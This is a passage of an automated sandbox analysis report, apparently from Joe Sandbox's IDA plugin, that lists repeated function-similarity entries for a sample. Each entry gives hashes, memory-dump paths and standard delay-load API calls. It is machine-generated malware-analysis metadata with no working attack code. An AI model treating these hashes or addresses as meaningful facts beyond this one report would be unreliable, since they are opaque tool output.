              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 10904b282e8d8670f7286e7373b820c0f0155d941baeaf8e4af06bfc71c298e8
              • Instruction ID: 912bcb791c9dbdb755fa51349b11f07e4b351bda2e80f0d943440da53def55a5
              • Opcode Fuzzy Hash: 10904b282e8d8670f7286e7373b820c0f0155d941baeaf8e4af06bfc71c298e8
              • Instruction Fuzzy Hash: F5B012D626C305BD710C21486E02FB6022CFAC1B103314A1AB30AE014099847CC95472
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DC36
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 964881a78e9ce4b385eb917588514b7f8b3d7ba7a025aa34e2eb9d20fb6a2b15
              • Instruction ID: d7a2d3a9dd52f2e00397fe94e85424a3326548131cd69875bca2cdcf85d6f6d3
              • Opcode Fuzzy Hash: 964881a78e9ce4b385eb917588514b7f8b3d7ba7a025aa34e2eb9d20fb6a2b15
              • Instruction Fuzzy Hash: 4DB012D626C301AC710C614C6C02FB6022CF9C6B10330891AB70ED1280D9847C894472
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DC36
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e2c0a2353b9a90bb7b5470e649820837c0075c05107bfef8bfbb090a7ff7e467
              • Instruction ID: 3ee6118f0067b5726310b3ca8f79aa7c343af6e8a32db33b26a26bb688abc4bc
              • Opcode Fuzzy Hash: e2c0a2353b9a90bb7b5470e649820837c0075c05107bfef8bfbb090a7ff7e467
              • Instruction Fuzzy Hash: E8B012D627C301AC710C614C6C02FB6022CF9C1B10330491BB30ED1240D9847C894472
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 541c1e2ab079e0f7c9eebe63b6b8af6ac4094d637187f3fada0e39cb2de4d435
              • Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
              • Opcode Fuzzy Hash: 541c1e2ab079e0f7c9eebe63b6b8af6ac4094d637187f3fada0e39cb2de4d435
              • Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1ebb49b0ffd33fabf2fec16edcd67e3e82539259c53bb7862a503f7c3ce24b03
              • Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
              • Opcode Fuzzy Hash: 1ebb49b0ffd33fabf2fec16edcd67e3e82539259c53bb7862a503f7c3ce24b03
              • Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e243b80690af2dde8379e7c336094f6bf203ab9abefb39b9157b0d3f4ffd3e9a
              • Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
              • Opcode Fuzzy Hash: e243b80690af2dde8379e7c336094f6bf203ab9abefb39b9157b0d3f4ffd3e9a
              • Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e223f659d277598c312119c87e9eeec2576e048a25d0f9ff364aeb88682f8397
              • Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
              • Opcode Fuzzy Hash: e223f659d277598c312119c87e9eeec2576e048a25d0f9ff364aeb88682f8397
              • Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b8b19c215b7b33560408237aabcad097188c10a3bf9c4e4740ff06a62c62659d
              • Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
              • Opcode Fuzzy Hash: b8b19c215b7b33560408237aabcad097188c10a3bf9c4e4740ff06a62c62659d
              • Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2c63d5ef367a8c3fc23a97aefe6de84cc4109dc82d143b36b034d3220151b84c
              • Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
              • Opcode Fuzzy Hash: 2c63d5ef367a8c3fc23a97aefe6de84cc4109dc82d143b36b034d3220151b84c
              • Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1215f3da617db43b7a90f6c70259259ac7c74dbd6dcc506384594093a4d881b1
              • Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
              • Opcode Fuzzy Hash: 1215f3da617db43b7a90f6c70259259ac7c74dbd6dcc506384594093a4d881b1
              • Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 66b7d54c019fb4b9c304a04e28e77e1e94bc82eb5513402828dbe6c25e874cdd
              • Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
              • Opcode Fuzzy Hash: 66b7d54c019fb4b9c304a04e28e77e1e94bc82eb5513402828dbe6c25e874cdd
              • Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 099d3916e076372c777796e1aebb4a9b2dc9d069e29f5fa6e9766be64f061793
              • Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
              • Opcode Fuzzy Hash: 099d3916e076372c777796e1aebb4a9b2dc9d069e29f5fa6e9766be64f061793
              • Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 36c6aa8d604fdeeeba1af2f68c8b535179dd5fc898a4d3e99df5715cb726c9b0
              • Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
              • Opcode Fuzzy Hash: 36c6aa8d604fdeeeba1af2f68c8b535179dd5fc898a4d3e99df5715cb726c9b0
              • Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 63c5bb8800afeba0725423b3f057ba9e5a5c537d79643c81a58eeb1cd1157e04
              • Instruction ID: 1ccd39b14914031851b3c0a1cce7c5cbc6f26b5bbe9469621a49081a4558d17a
              • Opcode Fuzzy Hash: 63c5bb8800afeba0725423b3f057ba9e5a5c537d79643c81a58eeb1cd1157e04
              • Instruction Fuzzy Hash: 5CA011E22AC202BC300C2200AC02EBA020CECC2BA0330882AB00BE00C0A8802C8A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 0ee5e133d322fbd84edf5ae66f179dee3268813cf6df4120295c481fd8f1bc35
              • Instruction ID: 9d62a8b38705bb3adfedf8f3db663c6c565b7e7818a0c4798457afda1c4df8b3
              • Opcode Fuzzy Hash: 0ee5e133d322fbd84edf5ae66f179dee3268813cf6df4120295c481fd8f1bc35
              • Instruction Fuzzy Hash: 1CA011E22AC2023C3008B202AC22EBB030CFCC0B22330820AB00BE0088A888088A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a0165cbb5d3a4de453400d5f36cd719a76326ec920bea12a14bf4a6da9ca2e8a
              • Instruction ID: 06f9fefc21d725cc01218839a8c49c5bb7af5885a4e86ae025b83cc8efe27696
              • Opcode Fuzzy Hash: a0165cbb5d3a4de453400d5f36cd719a76326ec920bea12a14bf4a6da9ca2e8a
              • Instruction Fuzzy Hash: 9FA012D116C2027C300871016C12E7B030CECC0B50330450AB007C0044584408850431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 52bfeb4c495bf5f65c3268a19d9bbeebb7c22bf0dc8204dac7dd5a767420bc09
              • Instruction ID: 06f9fefc21d725cc01218839a8c49c5bb7af5885a4e86ae025b83cc8efe27696
              • Opcode Fuzzy Hash: 52bfeb4c495bf5f65c3268a19d9bbeebb7c22bf0dc8204dac7dd5a767420bc09
              • Instruction Fuzzy Hash: 9FA012D116C2027C300871016C12E7B030CECC0B50330450AB007C0044584408850431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
